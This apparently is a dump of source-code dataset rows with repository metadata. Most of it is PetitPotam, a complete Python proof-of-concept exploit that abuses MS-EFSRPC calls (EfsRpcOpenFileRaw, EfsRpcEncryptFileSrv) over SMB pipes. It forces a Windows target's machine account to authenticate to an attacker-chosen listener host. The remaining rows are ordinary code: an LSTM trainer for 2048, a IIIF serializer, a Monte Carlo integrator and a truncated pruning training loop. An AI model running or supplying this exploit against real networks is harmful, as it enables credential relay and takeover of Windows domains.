hexsha
stringlengths 40
40
| size
int64 7
1.04M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
247
| max_stars_repo_name
stringlengths 4
125
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
368k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
247
| max_issues_repo_name
stringlengths 4
125
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
247
| max_forks_repo_name
stringlengths 4
125
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.04M
| avg_line_length
float64 1.77
618k
| max_line_length
int64 1
1.02M
| alphanum_fraction
float64 0
1
| original_content
stringlengths 7
1.04M
| filtered:remove_function_no_docstring
int64 -102
942k
| filtered:remove_class_no_docstring
int64 -354
977k
| filtered:remove_delete_markers
int64 0
60.1k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
30737425867bb55a2af14436ac1b6d6839ca34e3
| 16,368
|
py
|
Python
|
modules/exploit/use/petitpotam.py
|
astar-security/MaeGeri
|
b28b37fe1cb8c4f650b8a4c9019636c540262fda
|
[
"Apache-2.0"
] | null | null | null |
modules/exploit/use/petitpotam.py
|
astar-security/MaeGeri
|
b28b37fe1cb8c4f650b8a4c9019636c540262fda
|
[
"Apache-2.0"
] | null | null | null |
modules/exploit/use/petitpotam.py
|
astar-security/MaeGeri
|
b28b37fe1cb8c4f650b8a4c9019636c540262fda
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
################################################################################
# STRUCTURES
################################################################################
################################################################################
# RPC CALLS
################################################################################
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
if __name__ == '__main__':
main()
| 36.454343
| 243
| 0.574047
|
#!/usr/bin/env python
#
# Author: GILLES Lionel aka topotam (@topotam77)
#
# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo), shutd0wn(@ _nwodtuhs)
# "Most of" the code stolen from dementor.py from @3xocyte ;)
import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.uuid import uuidtup_to_bin
show_banner = '''
___ _ _ _ ___ _
| _ \ ___ | |_ (_) | |_ | _ \ ___ | |_ __ _ _ __
| _/ / -_) | _| | | | _| | _/ / _ \ | _| / _` | | ' \
_|_|_ \___| _\__| _|_|_ _\__| _|_|_ \___/ _\__| \__,_| |_|_|_|
_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
PoC to elicit machine account authentication via some MS-EFSRPC functions
by topotam (@topotam77)
Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
'''
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
def __str__( self ):
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
else:
return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
################################################################################
# STRUCTURES
################################################################################
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
structure = (
('Data', '20s'),
)
class EFS_EXIM_PIPE(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
class EFS_HASH_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
structure = (
('Type', DWORD),
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_HASH_BLOB),
('Display', LPWSTR),
)
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
('Lenght', DWORD),
('SID', RPC_SID),
('Hash', EFS_CERTIFICATE_BLOB),
)
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
align = 1
structure = (
('Cert', DWORD),
('Users', ENCRYPTION_CERTIFICATE_HASH),
)
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
structure = (
('Type', DWORD),
('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
('Certif', ENCRYPTION_CERTIFICATE),
('Blob', EFS_RPC_BLOB),
)
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
('Data', DWORD),
('cbData', PCHAR),
)
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
structure = (
('Data', ':'),
)
################################################################################
# RPC CALLS
################################################################################
class EfsRpcOpenFileRaw(NDRCALL):
opnum = 0
structure = (
('fileName', WSTR),
('Flag', ULONG),
)
class EfsRpcOpenFileRawResponse(NDRCALL):
structure = (
('hContext', EXIMPORT_CONTEXT_HANDLE),
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileSrv(NDRCALL):
opnum = 4
structure = (
('FileName', WSTR),
)
class EfsRpcEncryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDecryptFileSrv(NDRCALL):
opnum = 5
structure = (
('FileName', WSTR),
('Flag', ULONG),
)
class EfsRpcDecryptFileSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryUsersOnFile(NDRCALL):
opnum = 6
structure = (
('FileName', WSTR),
)
class EfsRpcQueryUsersOnFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcQueryRecoveryAgents(NDRCALL):
opnum = 7
structure = (
('FileName', WSTR),
)
class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcRemoveUsersFromFile(NDRCALL):
opnum = 8
structure = (
('FileName', WSTR),
('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
)
class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFile(NDRCALL):
opnum = 9
structure = (
('FileName', WSTR),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
)
class EfsRpcAddUsersToFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfo(NDRCALL):
opnum = 12
structure = (
('FileName', WSTR),
('infoClass', DWORD),
)
class EfsRpcFileKeyInfoResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
opnum = 13
structure = (
('SrcFileName', WSTR),
('DestFileName', WSTR),
('dwCreationDisposition', DWORD),
('dwAttributes', DWORD),
('RelativeSD', EFS_RPC_BLOB),
('bInheritHandle', BOOL),
)
class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcAddUsersToFileEx(NDRCALL):
opnum = 15
structure = (
('dwFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('dwAttributes', DWORD),
('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
)
class EfsRpcAddUsersToFileExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcFileKeyInfoEx(NDRCALL):
opnum = 16
structure = (
('dwFileKeyInfoFlags', DWORD),
('Reserved', EFS_RPC_BLOB),
('FileName', WSTR),
('InfoClass', DWORD),
)
class EfsRpcFileKeyInfoExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcGetEncryptedFileMetadata(NDRCALL):
opnum = 18
structure = (
('FileName', WSTR),
)
class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcSetEncryptedFileMetadata(NDRCALL):
opnum = 19
structure = (
('FileName', WSTR),
('OldEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsStreamBlob', EFS_RPC_BLOB),
('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
)
class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
class EfsRpcEncryptFileExSrv(NDRCALL):
opnum = 21
structure = (
('FileName', WSTR),
('ProtectorDescriptor', WSTR),
('Flags', ULONG),
)
class EfsRpcEncryptFileExSrvResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
#class EfsRpcQueryProtectors(NDRCALL):
# opnum = 21
# structure = (
# ('FileName', WSTR),
# ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
# )
#class EfsRpcQueryProtectorsResponse(NDRCALL):
# structure = (
# ('ErrorCode', ULONG),
# )
################################################################################
# OPNUMs and their corresponding structures
################################################################################
OPNUMS = {
0 : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
4 : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
5 : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
6 : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
7 : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
8 : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
9 : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
12 : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
13 : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
15 : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
16 : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
18 : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
19 : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
21 : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
# 22 : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
}
class CoerceAuth():
def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
binding_params = {
'lsarpc': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'efsr': {
'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
},
'samr': {
'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'lsass': {
'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
'netlogon': {
'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
},
}
rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
if hasattr(rpctransport, 'set_credentials'):
rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
if doKerberos:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
if targetIp:
rpctransport.setRemoteHost(targetIp)
dce = rpctransport.get_dce_rpc()
#dce.set_auth_type(RPC_C_AUTHN_WINNT)
#dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
try:
dce.connect()
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Connected!")
print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
except Exception as e:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
print("[+] Successfully bound!")
return dce
def EfsRpcOpenFileRaw(self, dce, listener):
print("[-] Sending EfsRpcOpenFileRaw!")
try:
request = EfsRpcOpenFileRaw()
request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
request['Flag'] = 0
#request.dump()
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
sys.exit()
if str(e).find('rpc_s_access_denied') >= 0:
print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
print('[+] OK! Using unpatched function!')
print("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
resp = dce.request(request)
except Exception as e:
if str(e).find('ERROR_BAD_NETPATH') >= 0:
print('[+] Got expected ERROR_BAD_NETPATH exception!!')
print('[+] Attack worked!')
pass
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
else:
print("Something went wrong, check error status => %s" % str(e))
sys.exit()
def main():
parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
parser.add_argument('-u', '--username', action="store", default='', help='valid username')
parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
parser.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass'], default='lsarpc', help='Named pipe to use (default: lsarpc)')
parser.add_argument('listener', help='ip address or hostname of listener')
parser.add_argument('target', help='ip address or hostname of target')
options = parser.parse_args()
if options.hashes is not None:
lmhash, nthash = options.hashes.split(':')
else:
lmhash = ''
nthash = ''
print(show_banner)
if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
from getpass import getpass
options.password = getpass("Password:")
plop = CoerceAuth()
dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=options.pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
plop.EfsRpcOpenFileRaw(dce, options.listener)
dce.disconnect()
sys.exit()
if __name__ == '__main__':
main()
| 7,103
| 4,628
| 1,111
|
2d3ca8371c21a92681fe90abff723c44bebc3c0d
| 3,045
|
py
|
Python
|
game2048/RNN_training.py
|
fuuuyuuu/2048-api
|
d96aa0bc7099e8ce7b792ec2b1051a44b4325eec
|
[
"Apache-2.0"
] | null | null | null |
game2048/RNN_training.py
|
fuuuyuuu/2048-api
|
d96aa0bc7099e8ce7b792ec2b1051a44b4325eec
|
[
"Apache-2.0"
] | null | null | null |
game2048/RNN_training.py
|
fuuuyuuu/2048-api
|
d96aa0bc7099e8ce7b792ec2b1051a44b4325eec
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from data_loader import data_load
from torch.autograd import Variable
import numpy as np
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
if __name__ == '__main__':
main()
| 31.71875
| 110
| 0.587521
|
import torch
from torch import nn
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
from data_loader import data_load
from torch.autograd import Variable
import numpy as np
# torch.manual_seed(1) # reproducible
# Hyper Parameters
EPOCH = 20 # train the training data n times, to save time, we just train 1 epoch
BATCH_SIZE = 6400
TIME_STEP = 4 # rnn time step / image height
INPUT_SIZE = 4 # rnn input size / image width
global LR;
LR = 0.001 # learning rate\
def DataLoad():
# board_data loading with a batche size
train_data = data_load(data_root = 'Train.csv', data_tensor = transforms.Compose([transforms.ToTensor()]))
X_train = torch.utils.data.DataLoader(train_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
# test_data = data_load(data_root='Test.csv', data_tensor=transforms.Compose([transforms.ToTensor()]))
# X_test = torch.utils.data.DataLoader(test_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=0)
return X_train
class RNN(nn.Module):
def __init__(self):
super(RNN, self).__init__()
self.my_rnn = nn.LSTM(
input_size=INPUT_SIZE,
hidden_size=512,
num_layers=4,
batch_first=True
)
self.out = nn.Linear(512, 4)
def forward(self, x):
r_out, (h_n, h_c) = self.my_rnn(x,None)
out = self.out(r_out[:, -1 ,:])
return out
def main():
global LR;
rnn_training = RNN()
train_data = DataLoad()
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
loss_func = nn.CrossEntropyLoss()
for epoch in range(EPOCH):
if epoch == 10:
LR = 0.0001
optimizer = torch.optim.Adam(rnn_training.parameters(), lr=LR)
for step, (train, target) in enumerate(train_data):
target = target.long();
b_x = Variable(train.view(-1,4,4))
# print(b_x.shape)
b_y = Variable(target)
if torch.cuda.is_available():
b_x = Variable(b_x).cuda()
b_y = b_y.cuda()
rnn_training = rnn_training.cuda()
optimizer.zero_grad()
output = rnn_training(b_x)
loss = loss_func(output, b_y)
loss.backward()
optimizer.step()
if step % 50 == 0:
train_output = output # (samples, time_step, input_size)
# pred_y = torch.max(train_output, 1)[1].data
pred_y = train_output.data.max(1)[1]
# print(type(pred_y), type(target))
num = (pred_y.eq(b_y.data).sum())
accuracy = 100*num / 6400
print('Epoch: ', epoch, '| train loss: %.4f' % loss, '| test accuracy: %.2f' % accuracy)
torch.save(rnn_training,'rnn_model_b'+str(epoch)+'.pkl')
torch.save(rnn_training, 'rnn_model_final.pkl')
if __name__ == '__main__':
main()
| 2,344
| 0
| 122
|
ce512afce118edf2c22282a539009707e00c705b
| 1,877
|
py
|
Python
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 18
|
2017-06-12T09:58:02.000Z
|
2021-10-01T11:14:34.000Z
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 276
|
2019-04-26T20:13:01.000Z
|
2022-03-31T10:26:28.000Z
|
apps/iiif/serializers/annotation_list.py
|
ecds/readux
|
4eac8b48efef8126f4f2be28b5eb943c85a89c2e
|
[
"Apache-2.0"
] | 7
|
2018-03-13T23:44:26.000Z
|
2021-09-15T17:54:55.000Z
|
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
import json
from django.core.serializers import serialize
from django.core.serializers.base import SerializerDoesNotExist
from .base import Serializer as JSONSerializer
from django.contrib.auth import get_user_model
from django.db.models import Q
import config.settings.local as settings
USER = get_user_model()
class Serializer(JSONSerializer):
"""
IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list
"""
class Deserializer:
"""Deserialize IIIF Annotation List
:raises SerializerDoesNotExist: Not yet implemented.
"""
| 36.096154
| 90
| 0.583378
|
# pylint: disable = attribute-defined-outside-init, too-few-public-methods
"""Module for serializing IIIF Annotation Lists"""
import json
from django.core.serializers import serialize
from django.core.serializers.base import SerializerDoesNotExist
from .base import Serializer as JSONSerializer
from django.contrib.auth import get_user_model
from django.db.models import Q
import config.settings.local as settings
USER = get_user_model()
class Serializer(JSONSerializer):
"""
IIIF V2 Annotation List https://iiif.io/api/presentation/2.1/#annotation-list
"""
def _init_options(self):
super()._init_options()
self.owners = self.json_kwargs.pop('owners', 0)
def get_dump_object(self, obj):
# TODO: Add more validation checks before trying to serialize.
if self.version == 'v2' or self.version is None:
data = {
"@context": "http://iiif.io/api/presentation/2/context.json",
"@id": '{h}/iiif/v2/{m}/list/{c}'.format(
h=settings.HOSTNAME,
m=obj.manifest.pid,
c=obj.pid
),
"@type": "sc:AnnotationList",
"resources": json.loads(
serialize(
'annotation',
obj.annotation_set.filter(
Q(owner=USER.objects.get(username='ocr')) |
Q(owner__in=self.owners)
),
is_list=True)
)
}
return data
return None
class Deserializer:
"""Deserialize IIIF Annotation List
:raises SerializerDoesNotExist: Not yet implemented.
"""
def __init__(self, *args, **kwargs):
raise SerializerDoesNotExist("annotation_list is a serialization-only serializer")
| 1,099
| 0
| 79
|
ec30a32c1bd8adc81def1f3444251698d0bc0811
| 26
|
py
|
Python
|
tranco/__init__.py
|
ZeroSum24/tranco-python-package
|
f9aeebaa0d25946323646886f1110cec197e0f54
|
[
"MIT"
] | 12
|
2019-05-24T17:17:07.000Z
|
2021-05-11T11:25:04.000Z
|
tranco/__init__.py
|
ZeroSum24/tranco-python-package
|
f9aeebaa0d25946323646886f1110cec197e0f54
|
[
"MIT"
] | 6
|
2019-06-11T21:10:42.000Z
|
2021-01-25T08:05:09.000Z
|
tranco/__init__.py
|
ZeroSum24/tranco-python-package
|
f9aeebaa0d25946323646886f1110cec197e0f54
|
[
"MIT"
] | 3
|
2019-02-26T15:17:54.000Z
|
2021-08-21T16:53:34.000Z
|
from .tranco import Tranco
| 26
| 26
| 0.846154
|
from .tranco import Tranco
| 0
| 0
| 0
|
6ace6f1e7b2b5d4ff7aa95d88b4bbe251e459eca
| 575
|
py
|
Python
|
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
FOMMS_integrate/stochastic.py
|
nschieber/FOMMS_integrate
|
87456d476ecee45b8a06782da12baa1ce4c08e88
|
[
"BSD-3-Clause"
] | null | null | null |
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
| 19.166667
| 52
| 0.553043
|
"""
This function implements 1d Monte Carlo integration
"""
import numpy as np
def monte_1d(x, f, trials):
"""
Compute a 1D definite integral
Parameters
----------
f : function
User defined function.
x : numpy array
Integration domain.
trials : integer
Total number of generated random samples.
Returns
-------
I : float
Integration result.
"""
a = x[0]
b = x[1]
d = (b - a) * np.random.rand(1, trials) + a
y = f(d)
print('Test addition')
return (b-a) * np.sum(y) / trials
| 0
| 0
| 0
|
138fa2e645bcd4f89b72e76fa68172d58825add1
| 3,047
|
py
|
Python
|
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
snip/train.py
|
3846chs/SNIP
|
de1771cf4c90edeaa9924ed406293b48ceece7a2
|
[
"MIT"
] | null | null | null |
import os
import tensorflow.compat.v1 as tf
import time
import numpy as np
# np.random._bit_generator = np.random.bit_generator
from augment import augment
| 45.477612
| 99
| 0.596652
|
import os
import tensorflow.compat.v1 as tf
import time
import numpy as np
# np.random._bit_generator = np.random.bit_generator
from augment import augment
def train(args, model, sess, dataset):
print('|========= START TRAINING =========|')
if not os.path.isdir(args.path_summary): os.makedirs(args.path_summary)
if not os.path.isdir(args.path_model): os.makedirs(args.path_model)
saver = tf.train.Saver()
random_state = np.random.RandomState(9)
writer = {}
writer['train'] = tf.summary.FileWriter(args.path_summary + '/train', sess.graph)
writer['val'] = tf.summary.FileWriter(args.path_summary + '/val')
t_start = time.time()
best_val_loss = 100
for itr in range(args.train_iterations):
batch = dataset.get_next_batch('train', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: True, model.pruned: True})
input_tensors = [model.outputs] # always execute the graph outputs
if (itr+1) % args.check_interval == 0:
input_tensors.extend([model.summ_op, model.sparsity])
input_tensors.extend([model.train_op])
result = sess.run(input_tensors, feed_dict)
# Check on validation set.
if (itr+1) % args.check_interval == 0:
batch = dataset.get_next_batch('val', args.training_batch_size)
batch = augment(batch, args.aug_kinds, random_state)
feed_dict = {}
feed_dict.update({model.inputs[key]: batch[key] for key in ['input', 'label']})
feed_dict.update({model.compress: False, model.is_train: False, model.pruned: True})
